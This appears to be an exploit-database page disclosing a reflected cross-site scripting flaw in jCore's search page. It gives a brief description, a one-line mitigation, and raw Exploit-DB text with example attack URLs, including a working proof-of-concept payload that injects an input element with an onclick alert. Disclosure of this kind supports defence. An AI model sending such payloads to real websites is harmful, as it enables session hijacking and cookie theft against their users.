header-logo
Suggest Exploit
vendor:
jCore
by:
loneferret
8.8
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: jCore
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: a:jcore:jcore
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Cross-Site Scripting (XSS) in jCore

A Cross-Site Scripting (XSS) vulnerability was discovered in jCore's search page, which allows an attacker to inject malicious JavaScript code into the search query. This code is then executed in the context of the user's browser, allowing the attacker to perform various malicious activities such as stealing cookies, hijacking sessions, and redirecting the user to malicious websites.

Mitigation:

To mitigate this vulnerability, jCore should ensure that all user-supplied input is properly sanitized and validated before being used in the search query.
Source

Exploit-DB raw data:

Found: loneferret
Vendor: jCore
Site: http://www.jcore.net/home
Software link: http://www.jcore.net/downloads

Search page is vulnerable to cross-site scripting.

Exploit:
http://server/modules/search?search=[xss here]
http://server/modules/search?search=</a>[xss here]

Example:
The result page will screw up. Hit the back button and you newly created
submit input type will be there. Fully functional.
http://server/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">